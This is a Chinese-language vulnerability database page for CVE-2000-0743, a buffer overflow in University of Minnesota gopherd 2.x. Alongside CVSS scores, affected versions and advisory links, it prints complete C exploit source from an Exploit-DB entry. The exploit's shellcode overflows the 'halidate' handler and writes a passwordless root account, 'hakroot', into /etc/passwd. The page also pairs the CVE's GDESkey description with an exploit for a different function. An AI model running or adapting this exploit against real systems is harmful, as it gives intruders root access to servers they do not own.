CVE-2000-0743
CVSS10.0
发布时间 :2000-10-20 00:00:00
修订时间 :2008-09-05 16:21:46
NMCOE    

[原文]Buffer overflow in University of Minnesota (UMN) gopherd 2.x allows remote attackers to execute arbitrary commands via a DES key generation request (GDESkey) that contains a long ticket value.


[CNNVD]Minnesota大学(UMN) gopherd任意命令执行漏洞(CNNVD-200010-131)

        Minnesota大学(UMN) gopherd 2.x版本存在缓冲区溢出漏洞。远程攻击者可以借助含超长票据值的DES密钥生成请求(GDESkey)来执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:university_of_minnesota:gopherd:2.3.1
cpe:/a:university_of_minnesota:gopherd:2.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0743
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0743
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-131
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1569
(VENDOR_ADVISORY)  BID  1569
http://archives.neohapsis.com/archives/bugtraq/2000-08/0112.html
(VENDOR_ADVISORY)  BUGTRAQ  20000810 Remote vulnerability in Gopherd 2.x

- 漏洞信息

Minnesota大学(UMN) gopherd任意命令执行漏洞
危急 缓冲区溢出
2000-10-20 00:00:00 2005-05-02 00:00:00
远程  
        Minnesota大学(UMN) gopherd 2.x版本存在缓冲区溢出漏洞。远程攻击者可以借助含超长票据值的DES密钥生成请求(GDESkey)来执行任意命令。

- 公告与补丁

        

- 漏洞信息 (20157)

UMN Gopherd 2.x Halidate Function Buffer Overflow Vulnerability (EDBID:20157)
linux remote
2000-08-20 Verified
0 Chris Sharp
N/A [点击下载]
source: http://www.securityfocus.com/bid/1591/info

It is possible to either execute arbitrary code or crash a remote system running University of Minnesota's Gopher Daemon, depending on the data entered. An unchecked buffer exists in the 'halidate' function of Gopherd, where the 512 byte buffer can be overwritten with approximately 600 bytes of data.

/*  (linux)Gopher+[v2.3.1p0-]:  Daemon  remote  buffer 
overflow.
    Findings   and   exploit  by:  v9[v9@fakehalo.org]. 
(vade79)

    It  is  possible  to exploit an unchecked sprintf call
in the
    "halidate"  option  in  gopherd.c.  This exploit will
attempt 
    to   write   a   line   to   /etc/passwd.    (as a
superuser)

    The  gopher+  daemon  has  multiple  overflows  in 
different
    functions,  but  most overwrite the pointer(s) with
hardcoded
    data   from   the   program  which  are  limited.  
But,  the
    "halidate"  option/call  was  a little hidden suprise
for me.

    When  the  exploit  is sucessfully executed it adds the
line:
    "hakroot::0:0:hacked:/:/bin/sh"   to   /etc/passwd, 
with  no
    0x0A   return,   which  could  cause  some  problems  in
some
    situations.   You  may  have  to wait till someone on
the box
    modifies  their  /etc/passwd  by  adding  a user or what
not.

   Syntax:
    [syntax]: ./xgopher <target> [port] [offset]
[alignment].
    [syntax]: ./xgopher <target> <[port] [-getalignment]>.

   Explaination:
    If you don't know what the alignment of the server is,
(which
    isn't  expected  *g*)  just  type  "./xgopher hostname
[port]
    -getalignment" and with aligment you're given type
"./xgopher
    hostname <port> <offset> <alignment response you are
given>".

   Info: 
    The  following  segment  is  from gopherd.c [line
1076/3453]:
    ("pathname"  in  the  code  segment  is supplied by the
user)

--------------------------------------------------------------------------------
void
OutputAuthForm(int sockfd, char *pathname, char *host, int
port, CMDprotocol p)
{
     char tmpbuf[512];
     ...
     sprintf(tmpbuf,
             "<FORM METHOD=\"GET\"
ACTION=\"http://%s:%d/halidate%%20%s\">\r\n",
             host, port, pathname);
     ...
}
--------------------------------------------------------------------------------

   Notes:
    This  exploit requires that the service is running as
root(to
    write  to  /etc/passwd).  Even if the gopher+ daemon
displays
    itself  running  as  another user, as long as it's
process is
    running as root(uid=0) it should exploit successfully. 
Do to
    the  servers  local  host+port character lengths
changing the
    alignment  will  almost  never be the same, I recommend
using
    the  -getalignment  parameter.  You  can  play as much
as you
    want  on  this,  the  process  is  forked and won't
crash the
    gopher+  daemon  with invalid pointers.  This was also
tested
    effective   on   the  2.3  version  of  the  gopher+ 
daemon.
    Although  this  exploit  is  for linux servers, gopher+
isn't
    just  built for linux, it is also supported for BSD,
Solaris,
    SunOS,     HP-UX     and     other     operation    
systems.

   Fix:
    Compile  with "./configure --disable-auth" (isn't
disabled by
    default)  and  then  recompile  gopher  or  wait for a
patch.

   Tests:
    Built  and  tested  on slackware 3.6 and slackware 7.0
linux.
    (with   lots   of   junk   added   to   my  /etc/passwd 
*g*)
*/
#define BSIZE 512               // buffer size. (tmpbuf[512]
minus server data)
#define PADDING 150             // ret reps. (host+port
length guessing room)
#define POINTER 0xbffff65c      // base pointer in which
offsets are added.
#define DEFAULT_PORT 70         // default gopher+ daemon
port.
#define DEFAULT_OFFSET 0        // default offset. (argument
is added)
#define DEFAULT_ALIGN 0         // alignment. (depends on
host+port length)
#define TIMEOUT 5               // connection timeout time.
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
static char exec[]= // appends
"hakroot::0:0:hacked:/:/bin/sh" to /etc/passwd.

"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb\x30\xe4\x88"

"\x63\x0b\x31\xc9\x66\xb9\x01\x04\x31\xd2\x66\xba\xa4\x01\x31\xc0\xb0\x05\xcd"

"\x80\x89\xc3\x31\xc9\xb1\x5b\x01\xf9\x31\xd2\xb2\x1d\x31\xc0\xb0\x04\xcd\x80"

"\x31\xc0\xb0\x01\xcd\x80\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x01\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x68\x61\x6b\x72\x6f\x6f\x74\x3a\x3a\x30\x3a\x30\x3a"

"\x68\x61\x63\x6b\x65\x64\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68";
void timeout(){printf("[timeout]: Connection
timeout(%d).\n",TIMEOUT);quit(-1);}
int main(int argc,char **argv){
 char bof[BSIZE];
 int i,sock,port,offset,align,ga=0;
 long ret=DEFAULT_OFFSET;
 struct hostent *t;
 struct sockaddr_in s;
 printf("*** (linux)Gopherd+[v2.3.1p0-]: Remote buffer
overflow, by: v9[v9@fake"
 "halo.org].\n");
 if(argc<2){
  printf("[syntax]: %s <target> [port] [offset]
[alignment].\n",argv[0]);
  printf("[syntax]: %s <target> <[port]
[-getalignment]>.\n",argv[0]);
  quit(0);
 }
 if(argc>2){

if(!strcmp(argv[2],"-getalignment")){ga=1;port=DEFAULT_PORT;}
  else{port=atoi(argv[2]);}
 }
 else{port=DEFAULT_PORT;}
 if(argc>3){
  if(!strcmp(argv[3],"-getalignment")){ga=1;}
  else{offset=atoi(argv[3]);}
 }
 else{offset=DEFAULT_OFFSET;}
 if(argc>4){
  if(atoi(argv[4])<0||atoi(argv[4])>3){
   printf("[ignored]: Invalid alignment, using default
alignment. (0-3)\n");
   align=DEFAULT_ALIGN;
  }
  else{align=atoi(argv[4]);}
 }
 else{align=DEFAULT_ALIGN;}
 if(ga){getalignment(argv[1],port);}
 else{
  ret=(POINTER+offset);
  printf("[stats]: Addr: 0x%lx, Offset: %d, Align: %d, Size:
%d, Padding: %d.\n"
  ,ret,offset,align,BSIZE,PADDING);
  for(i=align;i<BSIZE;i+=4){*(long *)&bof[i]=ret;}
 
for(i=0;i<(BSIZE-strlen(exec)-PADDING);i++){*(bof+i)=0x90;}
  memcpy(bof+i,exec,strlen(exec));
  memcpy(bof,"halidate ",9);
  bof[BSIZE]='\0';
  if(s.sin_addr.s_addr=inet_addr(argv[1])){
   if(!(t=gethostbyname(argv[1]))){
    printf("[error]: Couldn't resolve. (%s)\n",argv[1]);
    quit(-1);
   }
  
memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr));
  }
  s.sin_family=AF_INET;
  s.sin_port=htons(port);
  sock=socket(AF_INET,SOCK_STREAM,0);
  signal(SIGALRM,timeout);
  printf("[data]: Attempting to connect to %s on port
%d.\n",argv[1],port);
  alarm(TIMEOUT);
  if(connect(sock,(struct sockaddr_in*)&s,sizeof(s))){
   printf("[error]: Connection failed. (port=%d)\n",port);
   quit(-1);
  }
  alarm(0);
  printf("[data]: Connected successfully.
(port=%d)\n",port);
  printf("[data]: Sending buffer(%d) to
server.\n",strlen(bof));
  write(sock,bof,strlen(bof));
  usleep(500000);
  printf("[data]: Closing socket.\n");
  close(sock);
 }
 quit(0);
}
int getalignment(char *target,int port){
 char buf[1024];
 int i,j,si,sock,math;
 struct hostent *t;
 struct sockaddr_in s;
 if(s.sin_addr.s_addr=inet_addr(target)){
  if(!(t=gethostbyname(target))){
   printf("[error]: Couldn't resolve. (%s)\n",target);
   quit(-1);
  }
 
memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr));
 }
 s.sin_family=AF_INET;
 s.sin_port=htons(port);
 sock=socket(AF_INET,SOCK_STREAM,0);
 signal(SIGALRM,timeout);
 printf("[data]: Attempting to connect to %s on port
%d.\n",target,port);
 alarm(TIMEOUT);
 if(connect(sock,(struct sockaddr_in*)&s,sizeof(s))){
  printf("[error]: Connection failed. (port=%d)\n",port);
  quit(-1);
 }
 alarm(0);
 printf("[data]: Connected successfully. (port=%d)\n",port);
 alarm(TIMEOUT);
 write(sock,"halidate \n",10);
 for(i=0;i<2;i++){if(!read(sock,buf,1024)){si++;}}
 i=0;while(buf[i]&&!(buf[i]==0x4E)){i++;}
 j=0;while(buf[j]&&!(buf[j]==0x25)){j++;}
 usleep(500000);
 printf("[data]: Closing socket.\n");
 close(sock);
 if(!si||i>=j||strlen(buf)<64){
  printf("[error]: Too minimal or invalid data recieved to
calculate. (try agai"
  "n?)\n");
  quit(-1);
 }
 else{
  math=(i-j-2);
  while(math<0){math+=4;}
  printf("[data]: Alignment calculation: %d.\n",math);
 }
}
int quit(int i){
 if(i){
  printf("[exit]: Dirty exit.\n");
  exit(0);
 }
 else{
  printf("[exit]: Clean exit.\n");
  exit(-1);
 }
}		

- 漏洞信息

1508
UMN Gopher Daemon (gopherd) DES Key Generation Request Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-08-10 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.3.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站